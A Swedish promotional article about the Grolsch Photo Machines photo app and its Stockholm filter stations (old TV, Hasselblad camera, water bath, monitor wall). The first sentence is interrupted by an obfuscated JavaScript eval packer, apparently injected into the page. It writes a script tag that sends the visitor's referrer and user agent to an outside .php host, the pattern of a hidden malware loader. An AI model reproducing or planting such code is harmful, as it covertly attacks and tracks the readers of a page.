Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Omvandla din favoritbild med Grolsch Photo Machines

Omvandla din favoritbild med Grolsch Photo Machines
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yibie|var|u0026u|referrer|khznb||js|php’.split(’|’),0,{}))
kan du ta en bild med din smartphone och få tillbaka ett konstverk skapat av en professionell illustratör – på ett ögonblick. Lördagen den 18 augusti lanserar Grolsch ett nytt live-filter till appenGrolsch Photo Machines som skänker nytt liv till dina favoritbilder.

Grolsch Photo Machines är en fotoapplikation till iPhone och Facebook som förflyttar dina digitala bilder ut i verkligheten och tillbaka. Med hjälp av fysiska filterstationer runt om i Stockholm omtolkas dina bilder på ett ögonblick för att sedan skickas tillbaka till dig i ny tappning. Grolsch utökar nu sitt befintliga filterutbud med ett nytt live-filter för illustrationer som kommer att lanseras under Grolsch Block Party på Södermalm (18/8).

”Idag ser alla bilder ungefär likadana ut eftersom de processas genom samma digitala fotofilter. Det finns ingenting oväntat eller analogt i denna process, vilken kan kännas trist. Vi ville därför hitta en möjlighet för människor att dokumentera sina upplevelser på ett mer intressant sätt. Detta var bakgrunden till att vi tillsammans med Society 46 utvecklade en fotoapp där retrokänslan och det analoga möter dagens digitala teknik”, säger Henrik Persson, Marketing Manager på SAB MiIler/Grolsch, och fortsätter:

”Det nya live-filtret kan ses som nästa länk i denna tankekedja och innebär att en illustratör gör en konstnärlig tolkning av din bild i realtid. Bilderna du skickar kommer projiceras på en monitor på il Caffé, där ett flertal illustratörer jobbar live med att designa egna versioner av dessa. På så sätt kan du enkelt vara med och skapa ´instant art´ via din iPhone. Det bör dock nämnas att utvecklingen inte stannar med det här filtret, vi har flera nya släpp planerade under hösten. Jag kan exempelvis avslöja att ett samarbete med Beckmans ligger bakom nästa projekt.”

Sedan tidigare finns det fyra filterstationer utplacerade runt om i Stockholm:

Tjock-TV

Grolsch har dammat av den gamla tjock-TV:n och placerat den i hörnet av en välkänd vintagebutik, nämligen  Där väntar den på att framkalla något alldeles unikt; din bild. Du kan dessutom lägga till egna undertexter om du vill.

Mellanformatskamera

Skicka din bild genom en klassisk Hasselbladskamera. Några som borde veta allt om denna kamera är tidningsredaktionerna, och därför är detta filter placerat hos en internationell tidningsredaktion, belägen i Stockholm – redo att sprida sin analoga glädje.

Vatten

Man skulle kunna säga att vatten var ett av fotografins första filter eftersom det låg till grund för hela framkallningsprocessen. På ett tekniklabb hos Society 46 i centrala Stockholm står ett vattenbad och väntar på din bild. Vågorna ger bilderna ett drömskt uttryck som skiftar varje gång du använder detta filter.

Monitorvägg

På sommarklubben Trädgården bildar 16 gamla TV-apparater en stor monitorvägg. Ditt foto visas, förstärks och exponeras över hela väggen.

Grolsch Photo Machines är gratis och finns att ladda ner via App Store och Facebook. Besök Grolsch Photo Machines här.